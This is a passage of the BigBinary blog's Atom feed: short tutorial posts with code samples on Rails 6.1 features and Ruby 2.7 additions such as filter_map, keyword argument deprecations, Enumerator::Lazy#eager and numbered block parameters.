      <content type="html"><![CDATA[<p>Rails 6.1 adds support to handle <code>db:rollback</code> in applications with multiple databases.</p><p>Prior to this change, on executing <code>db:rollback</code>, Rails used to roll back the latest migration of the primary database. If we passed a <code>[:NAME]</code> option along with it to specify the database, we used to get an error. Check out the <a href="https://github.com/rails/rails/issues/38513">issue</a> for more details.</p><h4>Rails 6.0.0</h4><pre><code class="language-ruby">&gt; rails db:rollback:secondary
rails aborted!
Don't know how to build task `db:rollback:secondary` (See the list of available tasks with `rails --tasks`)
Did you mean?  db:rollback</code></pre><p>Starting with Rails 6.1, we need to pass the database name along with <code>db:rollback:[NAME]</code>, otherwise a <code>RuntimeError</code> is raised.</p><h4>Rails 6.1.0</h4><pre><code class="language-ruby">&gt; rails db:rollback
rails aborted!
You're using a multiple database application. To use `db:migrate:rollback` you must run the namespaced task with a VERSION. Available tasks are db:migrate:rollback:primary and db:migrate:rollback:secondary.

&gt; rails db:rollback:primary
== 20200731130500 CreateTeams: reverting ======================================
-- drop_table(:teams)
   -&gt; 0.0060s
== 20200731130500 CreateTeams: reverted (0.0104s) =============================</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/38770">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Render a liquid template when the template refers to other liquid templates]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/render-liquid-templates-when-the-template-refers-to-other-liquid-templates"/>
      <updated>2020-08-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/render-liquid-templates-when-the-template-refers-to-other-liquid-templates</id>
      <content type="html"><![CDATA[<p><a href="https://shopify.github.io/liquid/">Shopify's Liquid Templates</a> is a great way to do templating in Ruby on Rails applications.</p><p>If the template is as simple as this one, then there are no issues.</p><pre><code class="language-ruby">{% raw %}{% if user %}
  Hello {{ user.name }}
{% endif %}{% endraw %}</code></pre><p>However, sometimes we have a liquid template which uses other liquid templates. Here is an example.</p><h5>home.liquid</h5><pre><code class="language-handlebars">{% raw %}&lt;!DOCTYPE html&gt;
&lt;html&gt;
  &lt;head&gt;
    &lt;style&gt;{% asset 'main.css' %}&lt;/style&gt;
  &lt;/head&gt;
  &lt;body&gt;
    {% partial 'header' %}
    &lt;h1&gt;Home Page&lt;/h1&gt;
  &lt;/body&gt;
&lt;/html&gt;{% endraw %}</code></pre><p>In the above case <code>home.liquid</code> is using two other liquid templates, <code>main.css</code> and <code>header.liquid</code>.</p><p>Let's see what these templates look like.</p><h5>main.css</h5><pre><code class="language-handlebars">{% raw %}* {
  color: {{ theme.text_color }};
}

a {
  color: {{ theme.link_color }};
}{% endraw %}</code></pre><h5>header.liquid</h5><pre><code class="language-handlebars">{% raw %}&lt;nav&gt;{{ organization.name }}&lt;/nav&gt;{% endraw %}</code></pre><p>In order to include the assets and the partials, we need to create liquid tags.</p><p>Let's create a tag which will handle assets.</p><pre><code class="language-ruby"># app/lib/liquid/tags/asset.rb

module Liquid
  module Tags
    class Asset &lt; Liquid::Tag
      def initialize(tag_name, name, tokens)
        super
        @name = name.strip.remove(&quot;'&quot;)
      end

      def render(context)
        new_context = context.environments.first
        asset = Template.asset.find_by(filename: @name)
        Liquid::Template.parse(asset.content).render(new_context).html_safe
      end
    end
  end
end</code></pre><p>Let's create a tag that will handle partials.</p><pre><code class="language-ruby"># app/lib/liquid/tags/partial.rb

module Liquid
  module Tags
    class Partial &lt; Liquid::Tag
      def initialize(tag_name, name, tokens)
        super
        @name = name.strip.remove(&quot;'&quot;)
      end

      def render(context)
        new_context = context.environments.first
        # Remember, here we are not passing the extension
        asset = Template.partial.find_by(filename: @name + &quot;.liquid&quot;)
        Liquid::Template.parse(asset.content).render(new_context).html_safe
      end
    end
  end
end</code></pre><p>Let's create a new initializer and register these tags in it.</p><pre><code class="language-ruby"># config/initializers/liquid.rb

require 'liquid/tags/asset'
require 'liquid/tags/partial'

Liquid::Template.register_tag('asset', Liquid::Tags::Asset)
Liquid::Template.register_tag('partial', Liquid::Tags::Partial)</code></pre><p>Restart the server and now we can render the <code>home.liquid</code> template like this.</p><pre><code class="language-ruby">template = Template.template.find_by(filename: &quot;home.liquid&quot;)

attributes = {
  organization: { name: &quot;Example&quot; },
  theme: {
    text_color: &quot;#000000&quot;,
    link_color: &quot;#DBDBDB&quot;
  }
}

Liquid::Template.parse(template.content).render(attributes).html_safe</code></pre><p>Here we have a simple implementation of the tags. We can do much more, if needed, like looping over items to parse each item from the partial. That can be done by registering a separate tag for the item and passing in the id of the item so that the specific item can be found and parsed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 deprecates the use of exit statements in transaction]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-deprecates-the-use-of-return-break-or-throw-to-exit-a-transaction-block"/>
      <updated>2020-08-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-deprecates-the-use-of-return-break-or-throw-to-exit-a-transaction-block</id>
      <content type="html"><![CDATA[<p>Rails 6.1 deprecates the use of <code>return</code>, <code>break</code> or <code>throw</code> to exit a transaction block.</p><h4>return / break</h4><pre><code class="language-ruby">&gt;&gt; Post.transaction do
&gt;&gt;   @post.update(post_params)
&gt;&gt;
&gt;&gt;   break # or return
&gt;&gt; end

# =&gt; TRANSACTION (0.1ms)  begin transaction
# =&gt; DEPRECATION WARNING: Using `return`, `break` or `throw` to exit a transaction block is
# =&gt; deprecated without replacement. If the `throw` came from
# =&gt; `Timeout.timeout(duration)`, pass an exception class as a second
# =&gt; argument so it doesn't use `throw` to abort its block. This results
# =&gt; in the transaction being committed, but in the next release of Rails
# =&gt; it will rollback.
# =&gt; TRANSACTION (0.8ms)  commit transaction</code></pre><h4>throw</h4><pre><code class="language-ruby">&gt;&gt; Timeout.timeout(1) do
&gt;&gt;   Post.transaction do
&gt;&gt;     @post.update(post_params)
&gt;&gt;
&gt;&gt;     sleep 3 # simulate slow request
&gt;&gt;   end
&gt;&gt; end

# =&gt; TRANSACTION (0.1ms)  begin transaction
# =&gt; DEPRECATION WARNING: Using `return`, `break` or `throw` to exit a transaction block is
# =&gt; deprecated without replacement. If the `throw` came from
# =&gt; `Timeout.timeout(duration)`, pass an exception class as a second
# =&gt; argument so it doesn't use `throw` to abort its block. This results
# =&gt; in the transaction being committed, but in the next release of Rails
# =&gt; it will rollback.
# =&gt; TRANSACTION (1.6ms)  commit transaction
# =&gt; Completed 500 Internal Server Error in 1022ms (ActiveRecord: 3.2ms | Allocations: 9736)
# =&gt; Timeout::Error (execution expired)</code></pre><p>Here, even though the error was thrown, the transaction is committed. This is something which is going to change in future versions.</p><p>This happens because currently, when a transaction block is wrapped in <code>Timeout.timeout(duration)</code>, i.e. without the second argument (an exception class), <code>throw</code> is used to exit the transaction.</p><h4>Solution</h4><pre><code class="language-ruby">&gt;&gt; Timeout.timeout(1, Timeout::Error) do
&gt;&gt;   Post.transaction do
&gt;&gt;     @post.update(post_params)
&gt;&gt;
&gt;&gt;     sleep 3 # simulate slow request
&gt;&gt;   end
&gt;&gt; end

# =&gt; TRANSACTION (0.1ms)  begin transaction
# =&gt; TRANSACTION (0.7ms)  rollback transaction
# =&gt; Timeout::Error (execution expired)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/29333">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 creates abstract classes in multiple database mode]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-automatically-generates-abstract-class-when-using-multiple-databases"/>
      <updated>2020-08-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-automatically-generates-abstract-class-when-using-multiple-databases</id>
      <content type="html"><![CDATA[<p>Rails started supporting multiple databases from Rails 6.0. To use a specific database, we can specify the database connection in the model using <code>connects_to</code>. In the following case we want the <code>Person</code> model to connect to the <code>crm</code> database.</p><pre><code class="language-ruby">class Person &lt; ApplicationRecord
  connects_to database: { writing: :crm }
end</code></pre><p>As the application grows, more and more models start sharing the same database. Now a lot of models may contain a <code>connects_to</code> call to the same database.</p><pre><code class="language-ruby">class Person &lt; ApplicationRecord
  connects_to database: { writing: :crm }
end

class Order &lt; ApplicationRecord
  connects_to database: { writing: :crm }
end

class Sale &lt; ApplicationRecord
  connects_to database: { writing: :crm }
end</code></pre><p>In order to avoid the duplication, we can create an abstract class connecting to the database and manually inherit all the other models from that class. It could look like this.</p><pre><code class="language-ruby">class CrmRecord &lt; ApplicationRecord
  self.abstract_class = true
  connects_to database: { writing: :crm }
end

class Person &lt; CrmRecord
end

class Order &lt; CrmRecord
end

class Sale &lt; CrmRecord
end</code></pre><h4>Rails 6.1</h4><p>Before Rails 6.1 we had no choice but to create that abstract class manually. Rails 6.1 allows us to generate the abstract class when we are generating a model using <code>scaffold</code>.</p><pre><code class="language-bash">$ rails g scaffold Person name:string --database=crm</code></pre><p>It creates an abstract class named after the database, with <code>Record</code> appended. The generated model automatically inherits from the new abstract class.</p><pre><code class="language-ruby"># app/models/crm_record.rb
class CrmRecord &lt; ApplicationRecord
  self.abstract_class = true
  connects_to database: { writing: :crm }
end

# app/models/person.rb
class Person &lt; CrmRecord
end</code></pre><p>If the abstract class already exists, it is not created again. We can also use an existing class as the abstract class by passing the <code>parent</code> option to the scaffold command.</p><pre><code class="language-bash">$ rails g scaffold Customer name:string --database=crm --parent=PrimaryRecord</code></pre><p>This skips generating the <code>CrmRecord</code> class since we have told Rails to use the existing <code>PrimaryRecord</code> abstract class as the parent.</p><p>Check out the <a href="https://github.com/rails/rails/pull/39866">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds annotate_rendered_view_with_filenames for views]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-annotate_rendered_view_with_filenames-to-annotate-html-output"/>
      <updated>2020-07-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-annotate_rendered_view_with_filenames-to-annotate-html-output</id>
      <content type="html"><![CDATA[<p>Rails 6.1 makes it easier to debug rendered HTML by adding the name of each template used.</p><h4>Rails 6.1</h4><p>Add the following line in the <code>development.rb</code> file to enable this feature.</p><pre><code class="language-ruby">config.action_view.annotate_rendered_view_with_filenames = true</code></pre><p>Now the rendered HTML will contain comments indicating the beginning and end of each template.</p><p>Here is an example.</p><p><img src="/blog_images/2020/rails-6-1-adds-annotate_rendered_view_with_filenames-to-annotate-html-output/annotate_html_with_template_name.png" alt="Annotated HTML output"></p><p>In the image we can see the <code>begin</code> and <code>end</code> comments for each of the templates. This helps a lot when debugging webpages to find out which template is rendered. Check out the <a href="https://github.com/rails/rails/pull/38848">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 allows configuring default value of enum attributes]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-allows-enums-attributes-to-have-default-value"/>
      <updated>2020-07-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-allows-enums-attributes-to-have-default-value</id>
      <content type="html"><![CDATA[<p>Rails 6.1 makes it easier to configure a default value for Active Record enum attributes.</p><p>Let's take an example of blog posts with status and category columns.</p><pre><code class="language-ruby">class Post &lt; ApplicationRecord
  enum status: %i[draft reviewed published]
  enum category: { rails: &quot;Rails&quot;, react: &quot;React&quot; }
end</code></pre><p>Before Rails 6.1, defaults for enum attributes could be configured by applying a <code>default</code> at the database level.</p><pre><code class="language-ruby">class AddColumnStatusToPosts &lt; ActiveRecord::Migration[6.0]
  def change
    add_column :posts, :status, :integer, default: 0
    add_column :posts, :category, :string, default: &quot;Rails&quot;
  end
end</code></pre><p>From Rails 6.1, defaults for enum attributes can be configured directly in the Post model using the <code>_default</code> option.</p><pre><code class="language-ruby">class Post &lt; ApplicationRecord
  enum status: %i[draft reviewed published], _default: &quot;draft&quot;
  enum category: { rails: &quot;Rails&quot;, react: &quot;React&quot; }, _default: &quot;Rails&quot;
end</code></pre><p>The new approach to setting enum defaults has the following advantages. Let's understand them in the context of the Post model, with category as an example.</p><ul><li>When the category default value changes from <code>Rails</code> to <code>React</code>, in Rails 6 and previous versions we have to add a new migration to update the database column default.</li><li>Say the default value for the post category (i.e. <code>Rails</code>) is removed from the enum in the Post model. Rails 6 and previous versions wouldn't throw an exception and would continue to work without setting any default value. Rails 6.1 with the new syntax would raise an exception.</li></ul><p>Check out the <a href="https://github.com/rails/rails/pull/39820">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds support for where with a comparison operator]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-support-for-where-with-comparison-operator"/>
      <updated>2020-07-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-support-for-where-with-comparison-operator</id>
      <content type="html"><![CDATA[<p><strong><em>Please note that the PR discussed in this blog was <a href="https://github.com/rails/rails/issues/41271">reverted</a>.</em></strong></p><p>Rails 6.1 adds support for comparison operators in the <code>where</code> clause. The four comparison operators supported are:</p><ul><li>Greater than (&gt;).</li><li>Greater than or equal to (&gt;=).</li><li>Less than (&lt;).</li><li>Less than or equal to (&lt;=).</li></ul><p>The comparison operators are also supported by the finder methods in Active Record which internally use the where clause, for example <code>find_by</code>, <code>destroy_by</code> and <code>delete_by</code>.</p><p>The new style for comparisons has the following advantages:</p><ul><li>The <code>where</code> clause with a comparison operator doesn't raise an exception when the <code>ActiveRecord::Relation</code> uses an ambiguous column name.</li><li>The <code>where</code> clause with a comparison operator handles the proper precision of the database columns.</li></ul><p>Before Rails 6.1, to add a condition with a comparison in the where clause, we had to use raw SQL notation.</p><h4>Rails 6.0.0</h4><pre><code class="language-ruby">&gt;&gt; Post.where(&quot;DATE(published_at) &gt; DATE(?)&quot;, Date.today)
# =&gt; &lt;ActiveRecord::Relation [...]&gt;

&gt;&gt; Post.find_by(&quot;likes &lt; ?&quot;, 10)
# =&gt; &lt;ActiveRecord::Relation [...]&gt;

# Following query on execution would raise an exception.
&gt;&gt; Post.joins(:comments).where(&quot;likes &gt; 10&quot;)
# =&gt; ambiguous column name: id</code></pre><h4>Rails 6.1.0</h4><pre><code class="language-ruby">&gt;&gt; Post.where(&quot;published_at &gt;&quot;: Date.today)
# =&gt; &lt;ActiveRecord::Relation [...]&gt;

&gt;&gt; Post.find_by(&quot;likes &lt;&quot;: 10)
# =&gt; &lt;ActiveRecord::Relation [...]&gt;

# Following query on execution would NOT raise an exception.
&gt;&gt; Post.joins(:comments).where(&quot;likes &gt;&quot;: 10)
# =&gt; &lt;ActiveRecord::Relation [...]&gt;</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/39613">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 tracks Active Storage variant in the database]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-tracks-active-storage-variant-in-the-database"/>
      <updated>2020-06-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-tracks-active-storage-variant-in-the-database</id>
      <content type="html"><![CDATA[<p>Active Storage variants are transformations of the original image. These variants can be used as thumbnails, avatars, etc.</p><p>Active Storage generates variants <strong>on demand</strong> by downloading the original image. The image is transformed into a variant and is stored on a third party service like S3.</p><p>When a request to fetch a variant of an Active Storage object is made, Rails checks whether the variant has already been processed and is available on S3. But to do so Rails has to make a call to find out if the variant is available on S3. This extra call adds to the latency.</p><p>Active Storage has to wait until the variant check call is completed because S3 might not return the image when a GET request is made, due to eventual <a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/Introduction.html#ConsistencyModel">consistency</a>. This way Rails avoids downloading a broken image from S3 and uploading a broken image variant to S3 in case the variant is not present.</p><p>In Rails 6.1, Active Storage tracks the presence of the variant in the database. This change avoids the unnecessary remote request to check for the variant's presence on S3, and directly fetches or generates the image variant.</p><p>In Rails 6.1, the configuration to allow variant tracking in the database is by default set to true.</p><pre><code class="language-ruby">config.active_storage.track_variants = true</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/37901">pull request</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds Enumerable#filter_map]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-adds-enumerable-filter-map"/>
      <updated>2020-05-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-adds-enumerable-filter-map</id>
      <content type="html"><![CDATA[<p>Ruby 2.7 adds <a href="https://ruby-doc.org/core-2.7.0/Enumerable.html#method-i-filter_map">Enumerable#filter_map</a>, which is a combination of filter + map as the name indicates. The <code>filter_map</code> method filters and maps the enumerable's elements within a single iteration.</p><p>Before Ruby 2.7, we could have achieved the same with two iterations, using a <code>select</code> &amp; <code>map</code> combination or a <code>map</code> &amp; <code>compact</code> combination.</p><pre><code class="language-ruby">irb&gt; numbers = [3, 6, 7, 9, 5, 4]

# we can use select &amp; map to find squares of odd numbers
irb&gt; numbers.select { |x| x.odd? }.map { |x| x**2 }
=&gt; [9, 49, 81, 25]

# or we can use map &amp; compact to find squares of odd numbers
irb&gt; numbers.map { |x| x**2 if x.odd? }.compact
=&gt; [9, 49, 81, 25]</code></pre><h4>Ruby 2.7</h4><p>Ruby 2.7 adds <code>Enumerable#filter_map</code>, which can be used to filter &amp; map the elements in a single iteration and which is faster compared to the other options described above.</p><pre><code class="language-ruby">irb&gt; numbers = [3, 6, 7, 9, 5, 4]
irb&gt; numbers.filter_map { |x| x**2 if x.odd? }
=&gt; [9, 49, 81, 25]</code></pre><p>The original discussion started <a href="https://bugs.ruby-lang.org/issues/5663">8 years back</a>. Here is the latest <a href="https://bugs.ruby-lang.org/issues/15323">thread</a> and <a href="https://github.com/ruby/ruby/pull/2017/commits/38e04e15bf1d4e67c52630fa3fca1d4a056ea768">github commit</a> for reference.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 deprecates conversion of keyword arguments]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-deprecates-conversion-of-keyword-arguments"/>
      <updated>2020-04-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-deprecates-conversion-of-keyword-arguments</id>
      <content type="html"><![CDATA[<p>A notable change has been announced for Ruby 3 for which deprecation warning hasbeen added in Ruby 2.7. Ruby 2.7 deprecated automatic conversion of keywordarguments and positional arguments. This conversion will be completely removedin Ruby 3.</p><p><a href="https://github.com/ruby/ruby/blob/4643bf5d55af6f79266dd67b69bb6eb4ff82029a/doc/NEWS-2.7.0#the-spec-of-keyword-arguments-is-changed-towards-30-">Ruby 2.7 NEWS</a>has listed the spec of keyword arguments for Ruby 3.0. We will take the examplesmentioned there and for each scenario we will look into how we can fix them inthe existing codebase.</p><h4>Scenario 1</h4><p><em>When method definition accepts keyword arguments as the last argument.</em></p><pre><code class="language-ruby">def sum(a: 0, b: 0)  a + bend</code></pre><p>Passing exact keyword arguments in a method call is acceptable, but inapplications we usually pass a hash to a method call.</p><pre><code class="language-ruby">sum(a: 2, b: 4) # OKsum({ a: 2, b: 4 }) # Warned</code></pre><p>In this case, we can add a double splat operator to the hash to avoiddeprecation warning.</p><pre><code class="language-ruby">sum(**{ a: 2, b: 4 }) # OK</code></pre><h4>Scenario 2</h4><p><em>When method call passes keyword arguments but does not pass enough requiredpositional arguments.</em></p><p>If the number of positional arguments doesn't match with method definition, thenkeyword arguments passed in method call will be considered as the lastpositional argument to the method.</p><pre><code class="language-ruby">def sum(num, x: 0)  num.values.sum + xend</code></pre><pre><code class="language-ruby">sum(a: 2, b: 4) # Warnedsum(a: 2, b: 4, x: 6) # Warned</code></pre><p>To avoid deprecation warning and for code to be compatible with Ruby 3, weshould pass hash instead of keyword arguments in method call.</p><pre><code class="language-ruby">sum({ a: 2, b: 4 }) # OKsum({ a: 2, b: 4}, x: 6) # OK</code></pre><h4>Scenario 3</h4><p><em>When a 
method accepts a hash and keyword arguments but the method call passes only a hash or keyword arguments.</em></p><p>If the arguments in a method call are a mix of symbol keys and non-symbol keys, and the method definition accepts either one of them, then Ruby splits the keyword arguments but also raises a warning.</p><pre><code class="language-ruby">def sum(num={}, x: 0)
  num.values.sum + x
end</code></pre><pre><code class="language-ruby">sum(&quot;x&quot; =&gt; 2, x: 4) # Warned
sum(x: 2, &quot;x&quot; =&gt; 4) # Warned</code></pre><p>To fix this warning, we should pass the hash separately, as defined in the method definition.</p><pre><code class="language-ruby">sum({ &quot;x&quot; =&gt; 4 }, x: 2) # OK</code></pre><h4>Scenario 4</h4><p><em>When an empty hash with the double splat operator is passed to a method that doesn't accept keyword arguments.</em></p><p>Passing keyword arguments using the double splat operator to a method that doesn't accept keyword arguments will send an empty hash, similar to earlier versions of Ruby, but will raise a warning.</p><pre><code class="language-ruby">def sum(num)
  num.values.sum
end</code></pre><pre><code class="language-ruby">numbers = {}
sum(**numbers) # Warned</code></pre><p>To avoid this warning, we should change the method call to pass the hash instead of using the double splat operator.</p><pre><code class="language-ruby">numbers = {}
sum(numbers) # OK</code></pre><hr><h3>Added support for non-symbol keys</h3><p>In Ruby 2.6.0, support for non-symbol keys in a method call was removed. It is added back in Ruby 2.7.
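These deprecation warnings are easy to miss in day-to-day development, so it can help to surface them explicitly while auditing a codebase. The sketch below is our own example (not from the NEWS document): it turns deprecation warnings on via the Warning[:deprecated] flag added in Ruby 2.7, and applies the double splat fix from Scenario 1.

```ruby
# Surface deprecation warnings explicitly (Warning[:deprecated] was
# added in Ruby 2.7; on Ruby 2.7.0/2.7.1 it is on by default).
Warning[:deprecated] = true

def sum(a: 0, b: 0)
  a + b
end

# Splatting the hash passes real keyword arguments, so no warning is
# emitted on Ruby 2.7 and the call keeps working on Ruby 3.
args = { a: 2, b: 4 }
puts sum(**args) # prints 6
```

Running a test suite with this flag enabled makes every warned call site visible before the Ruby 3 upgrade.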
When a method accepts arbitrary keyword arguments using the double splat operator, non-symbol keys can also be passed.</p><pre><code class="language-ruby">def sum(**num)
  num.values.sum
end</code></pre><h5>ruby 2.6.5</h5><pre><code class="language-ruby">sum(&quot;x&quot; =&gt; 4, &quot;y&quot; =&gt; 3)
=&gt; ArgumentError (wrong number of arguments (given 1, expected 0))

sum(x: 4, y: 3)
=&gt; 7</code></pre><h5>ruby 2.7.0</h5><pre><code class="language-ruby">sum(&quot;x&quot; =&gt; 4, &quot;y&quot; =&gt; 3)
=&gt; 7

sum(x: 4, y: 3)
=&gt; 7</code></pre><hr><h3>Added support for <code>**nil</code></h3><p>Ruby 2.7 added support for <code>**nil</code> in a method definition to explicitly mention that the method doesn't accept any keyword arguments.</p><pre><code class="language-ruby">def sum(a, b, **nil)
  a + b
end

sum(2, 3, x: 4)
=&gt; ArgumentError (no keywords accepted)</code></pre><hr><p>To suppress the above deprecation warnings, we can use the <a href="https://github.com/ruby/ruby/blob/4643bf5d55af6f79266dd67b69bb6eb4ff82029a/doc/NEWS-2.7.0#warning-option-"><code>-W:no-deprecated</code> option</a>.</p><p>In conclusion, Ruby 2.7 has taken big steps towards changing the specification of keyword arguments, which will change completely in Ruby 3.</p><p>For more information on the discussion, code changes and official documentation, please head to the <a href="https://bugs.ruby-lang.org/issues/14183">Feature #14183</a> discussion, the <a href="https://github.com/ruby/ruby/pull/2395">pull request</a> and the <a href="https://github.com/ruby/ruby/blob/4643bf5d55af6f79266dd67b69bb6eb4ff82029a/doc/NEWS-2.7.0#the-spec-of-keyword-arguments-is-changed-towards-30-">NEWS release</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds Enumerator::Lazy#eager]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-adds-enumerator-lazy-eager"/>
      <updated>2020-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-adds-enumerator-lazy-eager</id>
       <content type="html"><![CDATA[<p>Ruby 2.0 introduced <a href="https://ruby-doc.org/core-2.7.0/Enumerator/Lazy.html"><code>Enumerator::Lazy</code></a>, a special type of enumerator which helps us process chains of operations on a collection without executing them instantly.</p><p>By applying the <a href="https://ruby-doc.org/core-2.7.0/Enumerable.html#method-i-lazy"><code>Enumerable#lazy</code></a> method on any enumerable object, we can convert that object into an <code>Enumerator::Lazy</code> object. The chain of actions on this lazy enumerator will be evaluated only when it is needed. It helps us process operations on large collections, files and infinite sequences seamlessly.</p><pre><code class="language-ruby"># This line of code will hang and you will have to quit the console with Ctrl+C.
irb&gt; list = (1..Float::INFINITY).select { |i| i%3 == 0 }.reject(&amp;:even?)

# Just by adding `lazy`, the line of code below executes properly
# and returns the result without going into an infinite loop. Here the chain of
# operations is performed as and when it is needed.
irb&gt; lazy_list = (1..Float::INFINITY).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?)
=&gt; #&lt;Enumerator::Lazy: ...&gt;
irb&gt; lazy_list.first(5)
=&gt; [3, 9, 15, 21, 27]</code></pre><p>When we chain more operations on an <code>Enumerable#lazy</code> object, it again returns a lazy object without executing the chain. So, when we pass lazy objects to any method which expects a normal enumerable object as an argument, we have to force evaluation on the lazy object by calling the <a href="https://ruby-doc.org/core-2.7.0/Enumerator/Lazy.html#method-i-to_a"><code>to_a</code></a> method or its alias <a href="https://ruby-doc.org/core-2.7.0/Enumerator/Lazy.html#method-i-force"><code>force</code></a>.</p><pre><code class="language-ruby"># Define a lazy enumerator object.
irb&gt; list = (1..30).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?)
=&gt; #&lt;Enumerator::Lazy: #&lt;Enumerator::Lazy: ...
1..30&gt;:select&gt;:reject&gt;

# A further chain of operations will again return a lazy enumerator.
irb&gt; result = list.select { |x| x if x &lt;= 15 }
=&gt; #&lt;Enumerator::Lazy: #&lt;Enumerator::Lazy: ... 1..30&gt;:select&gt;:reject&gt;:select&gt;

# It raises an error when we call the usual array methods on the result.
irb&gt; result.sample
NoMethodError (undefined method `sample' for #&lt;Enumerator::Lazy:0x00007faab182a5d8&gt;)
irb&gt; result.length
NoMethodError (undefined method `length' for #&lt;Enumerator::Lazy:0x00007faab182a5d8&gt;)

# We can call the normal array methods on the lazy object after forcing
# its actual execution with the methods mentioned above.
irb&gt; result.force.sample
=&gt; 9
irb&gt; result.to_a.length
=&gt; 3</code></pre><p>The <a href="https://ruby-doc.org/core-2.7.0/Enumerator/Lazy.html#method-i-eager"><code>Enumerator::Lazy#eager</code></a> method returns a normal enumerator from a lazy enumerator, so that the lazy enumerator object can be passed to any method which expects a normal enumerable object as an argument. Also, we can call the other usual array methods on the collection to get the desired results.</p><pre><code class="language-ruby"># By adding eager on the lazy object, the chain of operations returns
# the actual result here. If the object is passed to any method, the
# processed result will be received as an argument.
irb&gt; eager_list = (1..30).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?).eager
=&gt; #&lt;Enumerator: #&lt;Enumerator::Lazy: ...
1..30&gt;:select&gt;:reject&gt;:each&gt;
irb&gt; result = eager_list.select { |x| x if x &lt;= 15 }
irb&gt; result.sample
=&gt; 9
irb&gt; result.length
=&gt; 3</code></pre><p>In the same way, we can use the <code>eager</code> method when we pass a lazy enumerator as an argument to any method which expects a normal enumerator.</p><pre><code class="language-ruby">irb&gt; list = (1..10).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?)
irb&gt; def display(enum)
irb&gt;   enum.map { |x| p x }
irb&gt; end
irb&gt; display(list)
=&gt; #&lt;Enumerator::Lazy: #&lt;Enumerator::Lazy: ... 1..10&gt;:select&gt;:reject&gt;:map&gt;

irb&gt; eager_list = (1..10).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?).eager
irb&gt; display(eager_list)
3
9</code></pre><p>Here's the relevant <a href="https://github.com/ruby/ruby/commit/1d4bd229b898671328c2a942b04f08065c640c28">commit</a> and the <a href="https://bugs.ruby-lang.org/issues/15901">feature discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds numbered parameters as default block parameters]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-introduces-numbered-parameters-as-default-block-parameters"/>
      <updated>2020-03-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-introduces-numbered-parameters-as-default-block-parameters</id>
      <content type="html"><![CDATA[<p>At some point, all of us have used names like <code>a</code>, <code>n</code>, <code>i</code> etc. for block parameters. Below are a few examples where numbered parameters can come in handy.</p><pre><code class="language-ruby">&gt; (1..10).each { |n| p n * 3 }
&gt; { a: [1, 2, 3], b: [2, 4, 6], c: [3, 6, 9] }.each { |_k, v| p v }
&gt; [10, 100, 1000].each_with_index { |n, i| p n, i }</code></pre><p>Ruby 2.7 introduces a new way to access block parameters. From Ruby 2.7 onwards, if the block parameters are obvious and we wish to not use absurd names like <code>n</code> or <code>i</code>, we can use the numbered parameters which are available inside a block by default.</p><p>We can use <code>_1</code> for the first parameter, <code>_2</code> for the second parameter and so on.</p><p>Here's how Ruby 2.7 provides numbered parameters inside a block. Shown below are the examples from above, only this time using numbered parameters.</p><pre><code class="language-ruby">&gt; (1..10).each { p _1 * 3 }
&gt; { a: [1, 2, 3], b: [2, 4, 6], c: [3, 6, 9] }.each { p _2 }
